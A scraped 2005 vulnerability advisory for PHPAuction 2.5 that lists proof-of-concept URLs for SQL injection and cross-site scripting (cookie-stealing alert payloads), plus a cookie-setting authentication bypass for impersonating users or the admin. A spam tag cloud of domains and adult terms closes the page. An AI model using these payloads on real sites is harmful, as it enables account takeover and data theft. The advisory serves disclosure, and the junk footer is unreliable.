exploits , vulnerabilities , articles , PHPAuction Multiple Vulnerabilities
| Title |
PHPAuction Multiple Vulnerabilities |
| Published |
2005-07-07-12:00AM |
| Updated |
2005-07-07-05:25PM |
| Class |
Unknown |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to <dcrab@hackerscenter.com>. |
| Vulnerable |
PHPAuction PHPAuction 2.5 |
| Not Vulnerable |
|
| Code |
An exploit is not required.
The following proof of concept examples are available:
SQL Injection: /phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D= on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E
/viewnews.php?id='SQL_INJECTION
Cross-site scripting: /phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
/login.php?username=<script>alert(document.cookie)</script>
/viewnews.php?id=<script>alert(document.cookie)</script>
Authentication bypass:
Set the cookie as follows: Name: PHPAUCTION_RM_ID VALUE: Id number of the user/admin you want to impersonate (you can get it from thier profile)
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 10:49:34 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Tagger LE. /data/vuln Tagger LE. PHPKIT www.xxl.cx download t cnjunshi.b PHPKIT tamil sex spider man gaoyyq.cn gaoyyq.cn vidio mesu www.dnjxw. guest+book news for c gaoyyq.cn Launcher www.sex.tv WWW.Pink w filmale gaoyyq.cn invisison invision p zhqu.com www.80845. www.jphmob 200 /compo www.doudou mark hoppu tee news for c Microsoft 50 sent filmale leonscorne orgasmica jenna jame www.downlo Galena por CARMELLA B Www.kingsv www.tianya phpBB por www.nikepi news for c www.yxnet. vibiosexy paris hill Maureen La
|